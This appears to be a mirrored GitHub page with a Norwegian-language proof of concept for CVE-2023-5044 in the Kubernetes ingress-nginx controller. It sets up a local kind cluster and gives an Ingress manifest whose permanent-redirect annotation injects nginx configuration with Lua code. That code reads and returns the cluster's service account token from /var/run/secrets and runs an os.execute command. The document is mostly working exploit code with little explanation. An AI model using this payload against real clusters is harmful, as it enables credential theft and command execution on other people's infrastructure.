Giters

KubernetesBachelor / CVE-2023-5044

Poc for CVE 2023 5044

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-5044

Poc for CVE 2023 5044

Prerequisites

Kind: v0.20.0

Kubectl: v1.29.3

Docker: v26.0.0

PoC

Gi Docker riktige rettigheter

sudo usermod -aG docker $USER && newgrp docker

Start klusteret med extraPortMapping og node-labels for å klargjøre klusteret til å kjøre en ingress

cat <<EOF | kind create cluster --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    kind: InitConfiguration
    nodeRegistration:
      kubeletExtraArgs:
        node-labels: "ingress-ready=true"
  extraPortMappings:
  - containerPort: 80
    hostPort: 80
    protocol: TCP
  - containerPort: 443
    hostPort: 443
    protocol: TCP
EOF

Installer nginx ingress kontrolleren

kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml

.yaml fil for å sette opp en enkel http-echo service uten selve ingressen

kind: Pod
apiVersion: v1
metadata:
  name: foo-app
  labels:
    app: foo
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: foo-app
---
kind: Service
apiVersion: v1
metadata:
  name: foo-service
spec:
  selector:
    app: foo
  ports:
  # Default port used by the image
  - port: 8080
---
kind: Pod
apiVersion: v1
metadata:
  name: bar-app
  labels:
    app: bar
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: bar-app
---
kind: Service
apiVersion: v1
metadata:
  name: bar-service
spec:
  selector:
    app: bar
  ports:
  # Default port used by the image
  - port: 8080
---

.yaml fil for ingress med exploiten

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: exploit-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /$2
    nginx.ingress.kubernetes.io/permanent-redirect: https://www.google.com;}location ~* "^/exploit(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* "^/exploit(/|$)(.*)" { content_by_lua 'os.execute("touch /you")'
spec:
  rules:
  - http:
      paths:
      - pathType: Prefix
        path: /foo(/|$)(.*)
        backend:
          service:
            name: foo-service
            port:
              number: 8080
      - pathType: Prefix
        path: /bar(/|$)(.*)
        backend:
          service:
            name: bar-service
            port:
              number: 8080

"localhost/exploit" vil nå returnere med Service Account Token for ingress-NGINX secret til klusteret.

About

Poc for CVE 2023 5044